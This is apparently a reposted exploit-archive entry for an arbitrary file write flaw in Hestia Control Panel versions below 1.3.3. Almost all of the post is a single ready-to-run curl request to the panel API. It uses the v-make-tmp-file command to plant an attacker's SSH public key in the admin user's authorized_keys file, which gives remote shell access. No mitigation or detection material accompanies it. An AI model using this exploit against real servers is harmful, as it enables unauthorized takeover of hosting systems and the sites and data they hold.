# Hestia Control Panel 1.3.2 任意文件寫入漏洞
==EXP==
# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write # Date: 07.03.2021 # Author: Numan Türle # Vendor Homepage: https://hestiacp.com/ # Software Link: https://github.com/hestiacp/hestiacp # Version: < 1.3.3 # Tested on: HestiaCP Version 1.3.2 curl --location --request POST 'https://TARGET:8083/api/index.php' \ --form 'hash="HERE_API_KEY"' \ --form 'returncode="yes"' \ --form 'cmd="v-make-tmp-file"' \ --form 'arg1="ssh-rsa HERE_KEY"' \ --form 'arg2="/home/admin/.ssh/authorized_keys"' \ --form 'arg3=""' \ --form 'arg4=""' \ --form 'arg5=""'
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容